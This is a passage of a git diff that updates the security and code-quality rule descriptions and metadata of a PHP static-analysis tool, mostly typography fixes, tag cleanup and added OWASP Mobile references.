-
- ],
+ "tags": [],
"defaultSeverity": "Info",
"ruleSpecification": "RSPEC-3331",
"sqKey": "S3331",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3333.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3333.html
index 31f5243cd5..208d11b33d 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3333.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3333.html
@@ -2,7 +2,7 @@
fopen(). Leave it out, and there is no default limit, meaning that any file can be accessed. Include it, and PHP will refuse to access
files outside the allowed path.
open_basedir should be configured with a directory, which will then be accessible recursively. However, the use of .
-(current directory) as an open_basedir value should be avoided since it's resolved dynamically during script execution, so a
+(current directory) as an open_basedir value should be avoided since it’s resolved dynamically during script execution, so a
chdir('/') command could lay the whole server open to the script.
This is not a fool-proof configuration; it can be reset or overridden at the script level. But its use should be seen as a minimum due diligence
step. This rule raises an issue when open_basedir is not present in php.ini, and when open_basedir contains root,
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3334.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3334.html
index 69a0ecf236..048aed6421 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3334.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3334.html
@@ -1,4 +1,4 @@
-
allow_url_fopen and allow_url_include allow code to be read into a script from URL's. The ability to suck in executable
+
allow_url_fopen and allow_url_include allow code to be read into a script from URL’s. The ability to suck in executable
code from outside your site, coupled with imperfect input cleansing could lay your site bare to attackers. Even if your input filtering is perfect
today, are you prepared to bet your site that it will always be perfect in the future?
This rule raises an issue when either property is explicitly enabled in php.ini and when allow_url_fopen, which defaults to
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3336.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3336.html
index 22c85e0622..7d5cca5b30 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3336.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3336.html
@@ -1,13 +1,13 @@
-
PHP's session.use_trans_sid automatically appends the user's session id to urls when cookies are disabled. On the face of it, this
+
PHP’s session.use_trans_sid automatically appends the user’s session id to urls when cookies are disabled. On the face of it, this
seems like a nice way to let uncookie-able users use your site anyway. In reality, it makes those users vulnerable to having their sessions hijacked
by anyone who might:
- - see the URL over the user's shoulder
+ - see the URL over the user’s shoulder
- be sent the URL by the user
- retrieve the URL from browser history
- - ...
+ - …
-For that reason, it's better to practice a little "tough love" with your users and force them to turn on cookies.
+For that reason, it’s better to practice a little "tough love" with your users and force them to turn on cookies.
Since session.use_trans_sid is off by default, this rule raises an issue when it is explicitly enabled.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3337.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3337.html
index 652007c35e..b75c0f6fd6 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3337.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3337.html
@@ -1,5 +1,5 @@
enable_dl is on by default and allows open_basedir restrictions, which limit the files a script can access, to be
-ignored. For that reason, it's a dangerous option and should be explicitly turned off.
+ignored. For that reason, it’s a dangerous option and should be explicitly turned off.
This rule raises an issue when enable_dl is not explicitly set to 0 in php.ini.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.html
index 39c1c84810..cb556bd754 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.html
@@ -1,4 +1,4 @@
-file_uploads is an on-by-default PHP configuration that allows files to be uploaded to your site. Since accepting candy
+
file_uploads is an on-by-default PHP configuration that allows files to be uploaded to your site. Since accepting candy
files from strangers is inherently dangerous, this feature should be disabled unless it is absolutely necessary for your site.
This rule raises an issue when file_uploads is not explicitly disabled.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.json
index f889d6dcad..896dbca699 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-3338",
"sqKey": "S3338",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3358.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3358.html
index 7de43e64ae..326fe3dc15 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3358.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3358.html
@@ -1,4 +1,4 @@
-Just because you can do something, doesn't mean you should, and that's the case with nested ternary operations. Nesting ternary operators
+
Just because you can do something, doesn’t mean you should, and that’s the case with nested ternary operations. Nesting ternary operators
results in the kind of code that may seem clear as day when you write it, but six months later will leave maintainers (or worse - future you)
scratching their heads and cursing.
Instead, err on the side of clarity, and use another line to express the nested operation as a separate statement.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3699.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3699.json
index 32004084fa..6902b02900 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3699.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3699.json
@@ -1,14 +1,12 @@
{
- "title": "The output of functions that don't return anything should not be used",
+ "title": "The output of functions that don\u0027t return anything should not be used",
"type": "BUG",
"status": "ready",
"remediation": {
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3699",
"sqKey": "S3699",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3801.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3801.html
index d0044d63d7..f89d8a9b0f 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3801.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3801.html
@@ -20,7 +20,7 @@ Compliant Solution
return false;
}
-or
+or
function foo($a) {
if ($a == 1) {
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.html
index f7daa99eef..bbfb390b77 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.html
@@ -1,5 +1,5 @@
Having all branches in a switch or if chain with the same implementation is an error. Either a copy-paste error was made
-and something different should be executed, or there shouldn't be a switch/if chain at all.
+and something different should be executed, or there shouldn’t be a switch/if chain at all.
Noncompliant Code Example
if ($b == 0) { // Noncompliant
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.json
index c54f5efbeb..2d949d3bd3 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "15min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3923",
"sqKey": "S3923",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.html
index ef2d6ef0e7..0cb2888e40 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.html
@@ -1,6 +1,6 @@
The count of elements from an array or Countable object is always greater than or equal to zero. So testing that the count is greater than or equal
-to zero doesn't make sense, since the result is always true. Similarly testing that it is less than zero will always return
-false. Perhaps the intent was to check the non-emptiness of the object or array instead.
+to zero doesn’t make sense, since the result is always true. Similarly testing that it is less than zero will always return
+false. Perhaps the intent was to check the non-emptiness of the object or array instead.
Noncompliant Code Example
if (count($arr) >= 0) { ... }
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.json
index 93b1b55960..d97bbdc5aa 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "2min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3981",
"sqKey": "S3981",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4142.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4142.json
index 0045f516ef..f17133e3df 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4142.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4142.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-4142",
"sqKey": "S4142",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.html
index a81eb465e4..3d3e1c3cd6 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.html
@@ -23,6 +23,10 @@ See
OWASP Top 10 2017 Category A6 - Security
Misconfiguration
+ Mobile AppSec Verification
+ Standard - Network Communication Requirements
+ OWASP Mobile Top 10 2016 Category M3 - Insecure
+ Communication
MITRE, CWE-327 - Inadequate Encryption Strength
MITRE, CWE-326 - Use of a Broken or Risky Cryptographic Algorithm
SANS Top 25 - Porous Defenses
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.json
index 162685e2d1..04c521f5db 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.json
@@ -11,7 +11,8 @@
"privacy",
"owasp-a6",
"sans-top25-porous",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m3"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-4423",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.html
index 7361b16460..95ec61f5d4 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.html
@@ -1,18 +1,18 @@
Most of cryptographic systems require a sufficient key size to be robust against brute-force attacks.
NIST recommendations will be checked for these
use-cases:
-Digital Signature Generation and Verification:
+Digital Signature Generation and Verification:
- p ≥ 2048 AND q ≥ 224 for DSA (
p is key length and q the modulus length)
- n ≥ 2048 for RSA (
n is the key length)
-Key Agreement:
+Key Agreement:
- p ≥ 2048 AND q ≥ 224 for DH and MQV
- n ≥ 224 for ECDH and ECMQV (Examples:
secp192r1 is a non-compliant curve (n < 224) but secp224k1 is
compliant (n >= 224))
-Symmetric keys:
+Symmetric keys:
- key length ≥ 128 bits
@@ -41,6 +41,10 @@ See
OWASP Top 10 2017 Category A6 - Security
Misconfiguration
+ Mobile AppSec
+ Verification Standard - Cryptography Requirements
+ OWASP Mobile Top 10 2016 Category M5 -
+ Insufficient Cryptography
NIST 800-131A - Recommendation for Transitioning the
Use of Cryptographic Algorithms and Key Lengths
MITRE, CWE-326 - Inadequate Encryption Strength
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.json
index b221771b40..0d39b68b57 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.json
@@ -10,7 +10,8 @@
"cwe",
"privacy",
"owasp-a6",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-4426",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4433.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4433.html
index c7529a69d0..76fff8792e 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4433.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4433.html
@@ -7,7 +7,7 @@
Name/Password Authentication Mechanism by performing a bind request with a password value of non-zero length.
Anonymous binds and unauthenticated binds allow access to information in the LDAP directory without providing a password, their use is therefore
-strongly discouraged.
+strongly discouraged.
Noncompliant Code Example
$ldapconn = ldap_connect("ldap.example.com");
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4502.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4502.html
index 8c019f00a1..83bebc366a 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4502.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4502.html
@@ -1,5 +1,5 @@
A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced, by an attacker, to perform sensitive
-actions that he didn't intend, such as updating his profile or sending a message, more generally anything that can change the state of the
+actions that he didn’t intend, such as updating his profile or sending a message, more generally anything that can change the state of the
application.
The attacker can trick the user/victim to click on a link, corresponding to the privileged action, or to visit a malicious web site that embeds a
hidden web request and as web browsers automatically include cookies, the actions can be authenticated and sensitive.
@@ -17,7 +17,7 @@ Recommended Secure Coding Practices
to be activated by default for all unsafe HTTP
methods.
implemented, for example, with an unguessable CSRF token
-
+
Of course all sensitive operations should not be performed with safe HTTP methods like GET which are designed to be
used only for information retrieval.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.html
index 654295b212..5039a8fb01 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.html
@@ -5,11 +5,11 @@
vulnerability
Object deserialization from an untrusted source can lead to unexpected code execution. Deserialization takes a stream of bits and turns it into an
-object. If the stream contains the type of object you expect, all is well. But if you're deserializing data coming from untrusted input, and an
-attacker has inserted some other type of object, you're in trouble. Why? A known attack
-scenario involves the creation of a serialized PHP object with crafted attributes which will modify your application's behavior. This attack
+object. If the stream contains the type of object you expect, all is well. But if you’re deserializing data coming from untrusted input, and an
+attacker has inserted some other type of object, you’re in trouble. Why? A known attack
+scenario involves the creation of a serialized PHP object with crafted attributes which will modify your application’s behavior. This attack
relies on PHP magic methods like __desctruct, __wakeup or
-__string. The attacker doesn't necessarily need the source code of the targeted application to exploit the vulnerability, he can also
+__string. The attacker doesn’t necessarily need the source code of the targeted application to exploit the vulnerability, he can also
rely on the presence of open-source component and use tools to craft malicious payloads.
Ask Yourself Whether
@@ -26,7 +26,7 @@ Recommended Secure Coding Practices
- if it is a file, restrict the access to it.
- if it comes from the network, restrict who has access to the process, such as with a Firewall or by authenticating the sender first.
-
+
See
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.json
index 2a66791068..6b22bc3ab6 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "15min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-4508",
"sqKey": "S4508",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4524.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4524.json
index 7c98262c45..ede14d3c53 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4524.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4524.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-4524",
"sqKey": "S4524",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.html
index a2a163de97..c4ccef9107 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.html
@@ -42,7 +42,7 @@
Note that ereg* functions have been removed in PHP 7 and PHP 5 end of life date is the 1st of January 2019. Using PHP 5 is
dangerous as there will be no security fix.
-This rule's goal is to guide security code reviews.
+This rule’s goal is to guide security code reviews.
Ask Yourself Whether
- the executed regular expression is sensitive and a user can provide a string which will be analyzed by this regular expression.
@@ -53,9 +53,9 @@ Recommended Secure Coding Practices
Do not set the constant pcre.backtrack_limit to a high value as it will increase the resource consumption of PCRE functions.
Check the error codes of PCRE functions via preg_last_error.
Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for
-vulnerability reports mentioning the one engine you're are using. Do not run vulnerable regular expressions on user input.
+vulnerability reports mentioning the one engine you’re are using. Do not run vulnerable regular expressions on user input.
Use if possible a library which is not vulnerable to Redos Attacks such as Google Re2.
-Remember also that a ReDos attack is possible if a user-provided regular expression is executed. This rule won't detect this kind of injection.
+Remember also that a ReDos attack is possible if a user-provided regular expression is executed. This rule won’t detect this kind of injection.
Avoid executing a user input string as a regular expression or use at least preg_quote to escape regular expression characters.
Exceptions
An issue will be created for the functions mb_ereg_search_pos, mb_ereg_search_regs and mb_ereg_search if and
@@ -75,6 +75,4 @@
See
- OWASP Regular expression Denial of Service - ReDoS
-Deprecated
-This rule is deprecated; use {rule:php:S2631} instead.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.json
index 010403a29e..8e9f094db8 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.json
@@ -1,10 +1,8 @@
{
"title": "Using regular expressions is security-sensitive",
"type": "SECURITY_HOTSPOT",
- "status": "deprecated",
- "tags": [
-
- ],
+ "status": "ready",
+ "tags": [],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-4784",
"sqKey": "S4784",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.html
index 0d68ec13c1..9c810ae515 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.html
@@ -18,7 +18,7 @@ Ask Yourself Whether
a nonce is used, and the same value is reused multiple times, or the nonce is not random.
the RSA algorithm is used, and it does not incorporate an Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.
- the CBC (Cypher Block Chaining) algorithm is used for encryption, and it's IV (Initialization Vector) is not generated using a secure random
+ the CBC (Cypher Block Chaining) algorithm is used for encryption, and it’s IV (Initialization Vector) is not generated using a secure random
algorithm, or it is reused.
the Advanced Encryption Standard (AES) encryption algorithm is used with an unsecure mode. See the recommended practices for more information.
@@ -40,15 +40,15 @@ Recommended Secure Coding Practices
When using the RSA algorithm, incorporate an Optimal Asymmetric Encryption Padding (OAEP).
When CBC is used for encryption, the IV must be random and unpredictable. Otherwise it exposes the encrypted value to crypto-analysis attacks
like "Chosen-Plaintext Attacks". Thus a secure random algorithm should be used. An IV value should be associated to one and only one encryption
- cycle, because the IV's purpose is to ensure that the same plaintext encrypted twice will yield two different ciphertexts.
+ cycle, because the IV’s purpose is to ensure that the same plaintext encrypted twice will yield two different ciphertexts.
The Advanced Encryption Standard (AES) encryption algorithm can be used with various modes. Galois/Counter Mode (GCM) with no padding should be
preferred to the following combinations which are not secured:
- Electronic Codebook (ECB) mode: Under a given key, any given plaintext block always gets encrypted to the same ciphertext block. Thus, it
- does not hide data patterns well. In some senses, it doesn't provide serious message confidentiality, and it is not recommended for use in
+ does not hide data patterns well. In some senses, it doesn’t provide serious message confidentiality, and it is not recommended for use in
cryptographic protocols at all.
- Cipher Block Chaining (CBC) with PKCS#5 padding (or PKCS#7) is susceptible to padding oracle attacks.
-
+
Sensitive Code Example
Builtin functions
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.json
index 5b617c7cdf..7cf33bb370 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.json
@@ -2,9 +2,7 @@
"title": "Encrypting data is security-sensitive",
"type": "SECURITY_HOTSPOT",
"status": "deprecated",
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-4787",
"sqKey": "S4787",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.html
index 3de99e85b9..f2f99e53ea 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.html
@@ -6,12 +6,12 @@ Ask Yourself Whether
The hashed value is used in a security context like:
- User-password storage.
- - Security token generation (used to confirm e-mail when registering on a website, reset password, etc ...).
+ - Security token generation (used to confirm e-mail when registering on a website, reset password, etc …).
- To compute some message integrity.
There is a risk if you answered yes to any of those questions.
Recommended Secure Coding Practices
-Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it's even
+
Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even
better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2
because it slows down brute force attacks.
Sensitive Code Example
@@ -33,6 +33,10 @@ See
OWASP Top 10 2017 Category A6 - Security
Misconfiguration
+ Mobile AppSec
+ Verification Standard - Cryptography Requirements
+ OWASP Mobile Top 10 2016 Category M5 -
+ Insufficient Cryptography
MITRE, CWE-327 - Use of a Broken or Risky Cryptographic Algorithm
MITRE, CWE-916 - Use of Password Hash With Insufficient Computational Effort
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.json
index 48d5988850..9c5b4798c4 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.json
@@ -7,7 +7,8 @@
"spring",
"owasp-a6",
"sans-top25-porous",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-4790",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4792.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4792.html
index a8a4190f50..e1fca43418 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4792.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4792.html
@@ -28,7 +28,7 @@ Ask Yourself Whether
There is a risk if you answered yes to any of those questions.
Recommended Secure Coding Practices
- - Check that your production deployment doesn't have its loggers in "debug" mode as it might write sensitive information in logs.
+ - Check that your production deployment doesn’t have its loggers in "debug" mode as it might write sensitive information in logs.
- Production logs should be stored in a secure location which is only accessible to system administrators.
- Configure the loggers to display all warnings, info and error messages. Write relevant information such as the precise time of events and the
hostname.
@@ -39,12 +39,12 @@ Recommended Secure Coding Practices
- Add limits to the size of the logs and make sure that no user can fill the disk with logs. This can happen even when the user does not control
the logged information. An attacker could just repeat a logged action many times.
-Remember that configuring loggers properly doesn't make them bullet-proof. Here is a list of recommendations explaining on how to use your
+
Remember that configuring loggers properly doesn’t make them bullet-proof. Here is a list of recommendations explaining on how to use your
logs:
- - Don't log any sensitive information. This obviously includes passwords and credit card numbers but also any personal information such as user
- names, locations, etc... Usually any information which is protected by law is good candidate for removal.
- - Sanitize all user inputs before writing them in the logs. This includes checking its size, content, encoding, syntax, etc... As for any user
+
- Don’t log any sensitive information. This obviously includes passwords and credit card numbers but also any personal information such as user
+ names, locations, etc… Usually any information which is protected by law is good candidate for removal.
+ - Sanitize all user inputs before writing them in the logs. This includes checking its size, content, encoding, syntax, etc… As for any user
input, validate using whitelists whenever possible. Enabling users to write what they want in your logs can have many impacts. It could for example
use all your storage space or compromise your log indexing service.
- Log enough information to monitor suspicious activities and evaluate the impact an attacker might have on your systems. Register events such as
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4818.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4818.json
index 9f4e0843ad..ee901ec953 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4818.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4818.json
@@ -2,9 +2,7 @@
"title": "Using Sockets is security-sensitive",
"type": "SECURITY_HOTSPOT",
"status": "deprecated",
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-4818",
"sqKey": "S4818",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4823.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4823.json
index e6601a6198..f84acd7c6e 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4823.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4823.json
@@ -2,9 +2,7 @@
"title": "Using command line arguments is security-sensitive",
"type": "SECURITY_HOTSPOT",
"status": "deprecated",
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-4823",
"sqKey": "S4823",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4828.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4828.html
index a3d5801b16..103874ca9d 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4828.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4828.html
@@ -14,8 +14,8 @@
Ask Yourself Whether
There is a risk if you answered yes to any of those questions.
Recommended Secure Coding Practices
- - If the signal is sent because of a user's request. Check that the user is allowed to send this signal. You can for example forbid it if the
- user doesn't own the process.
+ - If the signal is sent because of a user’s request. Check that the user is allowed to send this signal. You can for example forbid it if the
+ user doesn’t own the process.
- Secure the source from which the process PID is read.
- Run the process sending the signals with minimal permissions.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4829.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4829.html
index 812d9f6838..9985aab70b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4829.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4829.html
@@ -39,7 +39,7 @@ Sensitive Code Example
$input = fopen('php://stdin', 'r'); // Sensitive
fclose($input); // OK
-See:
+See
Validation of X.509 certificates is essential to create secure SSL/TLS sessions not vulnerable to man-in-the-middle attacks.
+Validation of X.509 certificates is essential to create secure SSL/TLS sessions not vulnerable to man-in-the-middle attacks.
The certificate chain validation includes these steps:
It's not recommended to reinvent the wheel by implementing custom certificate chain validation.
+It’s not recommended to reinvent the wheel by implementing custom certificate chain validation.
TLS libraries provide built-in certificate validation functions that should be used.
@@ -23,6 +23,10 @@See
Starting from its version 8, Drupal is relying on namespaces to be compliant with PSR-4 standard. Drupal's modules should be compliant with
+href="https://github.com/php-fig/fig-standards/blob/master/accepted/PSR-4-autoloader.md">PSR-4 standard. Drupal’s modules should be compliant with
PSR-4 standard and therefore should no longer rely on include or include_once or require or
require_once functions.
This rule doesn't raise issues on autoload.php or ScriptHandler.php files.
This rule doesn’t raise issues on autoload.php or ScriptHandler.php files.
Granting correct permissions to users, applications, groups or roles and defining required permissions that allow access to a resource is sensitive, must therefore be done with care. For instance, it is obvious that only users with administrator privilege should be authorized to -add/remove the administrator permission of another user.
+add/remove the administrator permission of another user.There is a risk if you answered yes to any of those questions.
@@ -22,8 +22,8 @@CakePHP
